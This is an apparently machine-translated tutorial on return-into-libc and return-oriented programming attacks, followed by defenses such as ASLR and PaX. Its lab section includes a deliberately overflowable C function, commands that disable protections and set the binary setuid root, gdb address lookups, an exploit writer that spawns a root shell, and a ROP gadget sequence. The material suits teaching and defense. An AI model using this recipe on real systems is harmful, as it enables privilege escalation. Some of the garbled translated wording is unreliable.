Return-into-libc Attack and Defense

Source: Internet
Author: User

Return-into-libc Attack and Defense

This article first analyzes the principles of return-into-libc attacks, and introduces the experimental processes and results of traditional return-into-libc attacks on different platforms. Then, this article further introduces and explains the attack methods of the return-oriented programming. This attack can make up for the shortcomings of the traditional return-into-libc attack, making the attack more flexible and effective. Finally, this article provides defense methods for these attack methods. This article helps you understand the return-into-libc attack and how to prevent the attack in the system.

Preface

Buffer overflow attacks are the most common attack methods that exploit program defects and have become one of the important security threats currently.

Buffer overflow is always an important part of various security reports. Buffer overflow attacks are easily exploited by attackers because C and C ++ do not automatically detect Buffer Overflow operations, at the same time, it is difficult for programmers to always check whether the buffer may overflow when writing code. With overflow, attackers can write the expected data to any location in the program memory, and even include key data (such as the return address after function call) that controls the program execution flow ), in this way, the program execution process is controlled and malicious behaviors are performed.

The common attack method of buffer overflow is to inject the malicious code shellcode into the program and overwrite the return address of the function call of the program with its address, so that the malicious code is executed at the return rather than the code that should have been executed. That is to say, during the implementation of such attacks, malicious code is often first injected into the target vulnerability program. However, the Code segment of the program is usually set to unwritable, so Attackers need to place the attack code in the stack. To prevent such attacks, the buffer overflow defense mechanism adopts the non-execution stack technology, which makes the malicious code on the stack unexecutable. In order to avoid this defense mechanism, a new variant of return-into-libc attack emerged in buffer overflow. Return-into-libc attackers can launch attacks without the need to execute stacks or even inject new code. Therefore, if you want to write a program to run safely, you need to know what the Return-into-libc attack is, its attack principles, as well as possible defense methods and means.

Data Execution Protection Policies and return-into-libc attacks

As described in the preface, in a buffer overflow attack, attackers need to transfer the control flow of the vulnerability program to the attack code. For example, an attacker can tamper with the return address of the function through the buffer zone of the vulnerability program to point it to the stored malicious code shellcode, in this way, the malicious code will be redirected to the corresponding execution when the function returns. That is to say, this attack method needs to first inject (write) malicious code into the target program, and later jump to and execute this code segment.

In response to the above attack behavior (first write and then execute), the researchers proposed a data enforcement protection policy (DEP) to help defend against buffer overflow attacks. The security policy can control the program's access to the memory, that is, the protected program memory can be restricted to being written or executed only (w xor x), rather than being written and executed first. Currently, this security policy has been widely used in the system. The unexecutable stack described in the preface is a special case of this policy, that is, the stack can be written but not executable. Although the Data Execution Protection Policy provides security protection for the memory access when the program is running, it ensures that the memory can only be written or executed, but not written before execution. However, unfortunately, this protection method is not completely effective, and it still cannot defend against attacks that do not violate the w xor x protection policy.

The Return-into-libc attack method does not have a behavior pattern of simultaneous writing and execution, because it does not need to inject new malicious code, instead it is used to reuse existing functions in the vulnerability program to complete the attack, redirect the vulnerability program to an existing code sequence (such as the code sequence of the library function ). During the attack, attackers can still overwrite the return address of program function calls using the addresses of malicious code (such as the system () function in the libc library, and pass the reset parameters so that they can run as expected by attackers. This is why attackers use the return-into-libc method and the library functions provided by the program. This attack method avoids the injection and execution of attack code in the Data Execution Protection Policy.

Principle of Return-into-libc attack

Return-into-libc attacks can Return vulnerability functions to existing dynamic library functions in the memory space. To understand the return-into-libc attack, the architecture of the stack frame during program function calling is given first.

Figure 1. stack frame structure during function calling


Figure 1 shows the stack frame structure for a typical function call, which increases from a high address to a low address. Each time a function calls another function to push the stack to the lower address, the stack is cleared to the higher address when the function returns. For example, when main () calls func (arg_1, arg_2, arg_3), all parameters arg_1, arg_2, and arg_3 are first put into the stack. In Figure 1, parameters are pushed to the stack from the right to the left, because the function data transmission parameters in C language are pushed to the stack from the right to the left. The call command then presses the returned address to the stack and forwards the execution to func (). The return address is the address of the next instruction of the call Command, which is used to tell func () which instruction of the main () function starts to execute after the function returns. After entering the func function, you usually need to save the stack bottom pointer ebp of the main () function to the stack and save the current stack top pointer esp in ebp as the stack bottom of func. Next, the func function allocates space for local variables and so on in the stack. Therefore, stack frame structure 1 is shown when the function func () is called.

When the func () execution is complete, the leave Command copies the ebp to the esp to clear the local variables in the stack, then, the old ebp is popped up from the stack and put back the ebp register to restore the ebp to the bottom of the main () function stack. Then, the ret command gets the return address from the stack and returns it to the main () function for further execution.

Attackers can use the stack content to perform the return-into-libc attack. This is because the attacker can rewrite the return address as the address of a library function through buffer overflow, and re-write the parameters during execution of the library function into the stack. In this way, when the function is called, the parameter value set by the attacker is obtained, and the result is returned to the library function instead of main (). This library function actually helps attackers execute malicious behaviors. More complex attacks can also be achieved through the call chain of return-into-libc (continuous calls of a series of library functions.

Return-into-libc attack Experiment

X86 Platform attack Experiment

The author has carried out the return-into-libc attack experiment in Ubuntu x86 system. In this experiment, the vulnerability program is redirected to the system () function of the libc library function and the system ("/bin/sh") is executed. The experiment involves a vulnerability program and an attack program. During the attack, the attacker first writes the content in the overflow buffer to the file, and the vulnerability program reads the content in the buffer to cause overflow. For more information about attacks, see "return-to-libc attack experiment" in the resource ".

List 1. Core Content of the vulnerability Program
int bof(FILE *badfile){   ......      char buffer[12];                fread(buffer, sizeof(char), 50, badfile);    ......}

Listing 1 is the target vulnerability program. buffer overflow occurs when reading the badfile file. During the attack, you need to store the four bytes in the bof return address: buf [24-27] to the entry address of the system () function, then place the entry address of the exit function as the return address in the four bytes of buf [28-31, finally, put the system parameter "/bin/sh" in the four bytes of buf [32-35. If the overflow succeeds, the system () function is redirected to the bof return and the exit function is called.

Therefore, you must obtain the entry addresses of the system () and exit () functions, and the address of the system parameter "/bin/sh.

Step 1: Compile the vulnerability Program
sudo sysctl -w kernel.randomize_va_space=0gcc -g -fno-stack-protector -o retlibc retlibc.csudo chown root:root retlibcsudo chmod 4755 retlibc

Step 2: Place "/bin/sh" in the environment variable BIN_SH and use the getenv () function to obtain its approximate address 0xbffffe1c. However, the address of the actual string "/bin/sh" still needs to be further confirmed.

$gdb retlibc......(gdb)p/x *0xbffffe1c@4$1={0x5f4e4942,0x2f3d4853,0x2f6e6962,0x48006873}(gdb)p/x *0xbffffe23@4$2={0x6e69622f,0x68732f,0x454d4f48,0x6f682f3d}(gdb)x/8ub 0xbffffe230xbffffe23: 47 98 105 110 47 115 104 0(gdb)

The last command prints the ASCII code of the actual string "/bin/sh", so we can infer that the "/bin/sh" string is near 0xbffffe23. In actual attacks, we can find that the actual string address is 0xbffffe24.

Step 3: Use GDB to obtain the entry addresses of system () and exit.

$gdb retlibc......(gdb) p system$1={ 0x168680 (gdb)p exit$2={ 0x15e6e0 (gdb)

Step 4: After obtaining three addresses, you can get the attack program in Listing 2 and launch the attack.

List 2. core content of the attack program

int main(int argc, char **argv) {   ......              *(long *) &buf[24] = 0x168680 ; // system()      *(long *) &buf[28] = 0x15e6e0 ; // exit()      *(long *) &buf[32] = 0xbffffe24; // "/bin/sh"      fwrite(buf, sizeof(buf), 1, badfile);    ...... }

Attack

$./retlibc#exit$

The attack experiment shows that the return-into-libc attack can be successfully implemented on the x86 platform. If the system ("/bin/sh") is executed and the root permission is obtained, what about the x86_64 platform?

X86_64 platform attack Experiment

The experiment on the x86_64 platform is similar to that on the x86 platform. We constructed a fake stack frame content for the false system () function and asked it to execute the specific command "/bin/sh", but the attack was not successful. This is because in the x86_64 CPU platform, during program execution, parameters are passed through registers instead of stacks, while return-into-libc needs to pass parameters through stacks. Therefore, the system () function cannot obtain the correct parameters. To verify this, we track the process after entering system () through gdb.
$gdb retlibc......(gdb)p/x $rdi$1=0x7fffffffe012(gdb)set $rdi=0x7fffffffeddf(gdb)ccontinuing.$pwd/home/fmliu/paper$

The system () function obtains the address of the parameter "/bin/sh" through the rdi register. Therefore, in gdb, we reset the value of the rdi register to the string address, and then the attack can be implemented. Therefore, the attack is indeed caused by passing parameters through registers rather than stacks. Although the traditional return-into-libc method fails, the x86_64 platform can still be further implemented through the return-oriented programming discussed in the next section ..

Return-Oriented Programming

In the previous experiment, the Return-into-libc attack uses the address of the library function to overwrite the Return address of the program function call, so that the library function can be called when the program returns, so that the attack can be successfully implemented. However, because the sequence of commands available by attackers can only be existing functions in the application, the attack capability of this method is limited. In addition, as discussed in the previous section, attacks can only be implemented on the x86 CPU platform, but are not valid on the x86_64 CPU platform. This is because in the x86_64CPU platform in our experiment, when a program is executed, the parameters are not passed through the stack but through the Register, while return-into-libc needs to pass the parameters through the stack. If the system () parameter needs to pass % rdi through the Register, the attack will fail, and the attacker cannot control the control flow during the attack.

Due to the limitations of this return-into-libc attack method, Return-Oriented Programming (ROP) is proposed and becomes an effective method of return-into-libc attacks. The method of return-Oriented Programming attack is no longer limited to jump the control flow of the vulnerability program to the library function, but a set of command sequences that can be identified and selected by the program and library function. The attacker concatenates these command sequences to form the shellcode required for the attack to conduct subsequent attacks. Therefore, you can perform any operation without injecting new commands into the vulnerability program. At the same time, it does not use complete library functions, so it does not rely on function calls to pass parameters through the stack.

In response-oriented programming attacks, attackers first need to select the command to build shellcode. The command can come from the application binary code or the Link Library. These commands can be connected to form the entire shellcode function. In short, each consecutive sequence of commands is ended with a "return" command, in this way, if the attacker puts the First Command address of the next command sequence ending with the "return" command in the stack, when the previous "return" command is executed and returned, the First Command address of the last command sequence in the pop stack is redirected to the next command sequence for execution. And so on, we can establish a chain of drops to complete the entire attack.

For example, in the x86_64 platform attack, when passing parameters to the system () function, you must set % rdi to a specific value and "call" the system function. This function can be achieved by building a drop-down chain. An instance 2 is provided in "x86_64 buffer overflow exploits and the borrowed code chunks exploitation technique.

Figure 2.construction of the drop-down chain and stack content

List 3.sequence of commands executed by the drop-down instance

pop %rbxretqmov %rbx,%raxadd $0xe0,%rsppop %rbxretqmove %rsp,%rdicallq *%eax

1. The Assembly command contains the address of the system () function in the rbx register. Then, the system returns and executes the 3rd statement Assembly command.

2. 3rd-6 Assembly commands pass the rbx register content into rax, that is, use rax to save the address of the system () function.

3. The last two assembly commands set the rdi value of the register and call the system () function pointed to by eax.

From the above example, we can see that the instruction stream of the ROP attack code has certain characteristics in form, that is, the Code contains a large number of "return" instructions. At the same time, each short command sequence is usually short. Generally, it contains only two or three Assembly statements, which only completes part of the entire shellcode. These commands are connected through the "return" command to implement the final shellcode Execution. Unlike traditional return-into-libc attacks, in traditional attacks, each command sequence is actually the entire function, rather than several Assembly commands in the drop-down attack. Therefore, the ROP attack is more flexible in a lower abstraction layer. There are many techniques for building a drop-down chain. For details, refer to the articles on return-oriented programming in reference resources.

Defense Mechanism

To defend against General buffer overflow attacks, on the one hand, programmers need to use functions that can prevent buffer overflow to guard against attacks. On the other hand, such defense can be provided by the system. For example, the Data Execution Protection Mechanism (DEP) can protect the program's memory so that it cannot be written or executed at the same time, thus preventing code injection-type buffer overflow attacks. However, these mechanisms still cannot effectively defend against the attack of reusing existing code, such as return-into-libc and return-oriented programming. Therefore, further solutions are needed.

Currently, Address Space Layout Randomization (ASLR) is one of the most effective defense mechanisms for return-into-libc and return-Oriented Programming attacks. ASLR can randomize the heap, stack, code, and shared library addresses of processes during each running of the program, it greatly increases the difficulty of locating the correct location of the Code to be used, and thus greatly increases the difficulty of return-into-libc and return-Oriented Programming attacks and the ability to defend against attacks. Because the address during program running is randomized, the attacker cannot directly locate the random memory address to be used during the attack, instead, you can only rely on guesses about the actual addresses of the data and code runtime. Therefore, attackers are less likely to guess, and it is difficult to initiate an attack. At the same time, it is easy to cause the program to crash while running, thus reducing the difficulty of detecting attacks.

PaX

Pax is a kernel patch. It initially features that it does not allow execution of any data segment, but it does not provide sufficient protection against return-into-libc and return-Oriented Programming attacks. Therefore, to defend against such attacks, PaX adds the function of randomizing the memory addresses of code and data. These functions have been widely used in Linux. If the CONFIG_PAX_RANDMMAP option is set during Kernel configuration, database functions, stacks, and program base addresses can all be mapped to a random address in the memory. PaX randomizes the address space of the process when the program is running. It does not need to modify the program itself, enhancing the defense against this method of reusing existing legitimate code attacks. However, the disadvantage of this method is that PaX technology cannot change the code or data sequence in the program in the memory, increasing the attack difficulty.

Address Obfuscation

The Address Randomization method can not only randomize the memory base addresses of stacks, heaps, dynamic libraries, functions, and static data, you can also randomize the relative addresses of program data (including changes in the sequence of variables or functions ). Compared with PaX, PaX not only can defend against attacks that use the base address in PaX, but also attacks that use relative address guesses. Later, the author of this technology, Bhatkar, proposed a method to randomize C programs using source code conversion. Every time a program is loaded and running, the virtual memory space of the process is randomized once.

Conclusion

Compared with General buffer overflow attacks, return-into-libc attacks are more difficult to defend against. It can avoid data protection policies and become a more effective and risky buffer overflow attack. Therefore, you need to understand the principles of return-into-libc attacks and how to prevent them in the system. Currently, address space layout randomization ASLR is one of the most effective defense mechanisms for return-into-libc attacks, including kernel patch PaX and address obfuscation. ASLR can randomize the addresses of processes such as heap, stack, code, and shared library every time the program runs, making it difficult for attackers to initiate attacks successfully, at the same time, it is easier to cause the program to crash during the attack, making the detection mechanism easier to detect such attacks. The defense mechanisms provided in this Article can help readers protect their programs and avoid the security problems caused by the return-into-libc attack.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.